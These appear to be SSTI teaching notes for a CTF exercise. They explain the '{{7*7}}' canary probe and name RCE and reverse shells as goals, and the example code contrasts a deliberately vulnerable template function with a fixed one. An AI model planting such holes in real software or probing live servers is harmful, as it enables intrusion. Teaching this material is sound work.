

Server-Side Template Injection

Server-Side Templating (History)

There has been a pendulum between client-side rendering and server-side rendering that is swinging back towards server-side rendering.

This is always determined by profits. In the 90s, server-side rendering made cool experiences... THAT COST A TON for the company to provide.

So we moved it client-side with AJAX, which allowed the internet companies to work.

Now computing is SO CHEAP that the extra milliseconds we save by not having your mobile device do too much computing reduce bounce rates... so back to the 90s we go.

Template Injection

So if a page is built dynamically on the server and our input ends up inside the template, we can attempt to inject malicious code into it.

The canary in the coal mine is just 7*7. If I can see 49 and not 7*7, then I'm getting code to evaluate. HUGE WIN.
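Why the canary works, as an added example that is not the course's or the challenge's source code: input glued into the template source gets evaluated, while input passed in as data stays literal text. The `render` function is a toy stand-in for a template engine, and the `{{ }}` delimiters and all function names are assumptions made for this illustration.

```javascript
// Toy template engine (constructed for this example, not a real library).
// It understands {{ name }} lookups and {{ a*b }} integer products only,
// which is enough to show what the 7*7 canary detects.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function render(template, data = {}) {
  return template.replace(/\{\{\s*(.*?)\s*\}\}/g, (_, expr) => {
    const product = expr.match(/^(\d+)\s*\*\s*(\d+)$/);
    if (product) return String(Number(product[1]) * Number(product[2]));
    // Substituted values are returned as-is and never re-scanned for {{ }}.
    return Object.prototype.hasOwnProperty.call(data, expr)
      ? escapeHtml(data[expr])
      : "";
  });
}

// VULNERABLE: user input is concatenated into the template *source*,
// so anything inside {{ }} is evaluated by the engine.
function greetVulnerable(name) {
  return render("Hello " + name + "!");
}

// FIXED: the template is a constant; user input is passed only as *data*.
function greetSafe(name) {
  return render("Hello {{ name }}!", { name });
}

// The check from the text: 49 shows up and the literal 7*7 does not.
function canaryEvaluated(output) {
  return output.includes("49") && !output.includes("7*7");
}

// Constructed sample input: the canary wrapped in the toy engine's delimiters.
const probe = "{{7*7}}";
console.log(greetVulnerable(probe), canaryEvaluated(greetVulnerable(probe)));
console.log(greetSafe(probe), canaryEvaluated(greetSafe(probe)));
```

The same check works as a regression test after a fix: render the probe through every user-controlled field and fail the build if `canaryEvaluated` ever returns true.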

Back to Jail

Once you can get some remote code execution (RCE), you start figuring out what gadgets you have available to you.

For this there are many cool tricks, payloads, etc. to learn.

Part 1: Get the Flag. https://general-immediate-fish.glitch.me/stuffhere and Source code here

Reverse Shells

Now, here's the real "win": if you have some super-constrained RCE, can you turn around and get a complete shell on that server?

That is called a REVERSE SHELL.

Useful stuff:

Part 2: Get a Reverse Shell https://general-immediate-fish.glitch.me/stuffhere and Source code here

Secret Answers: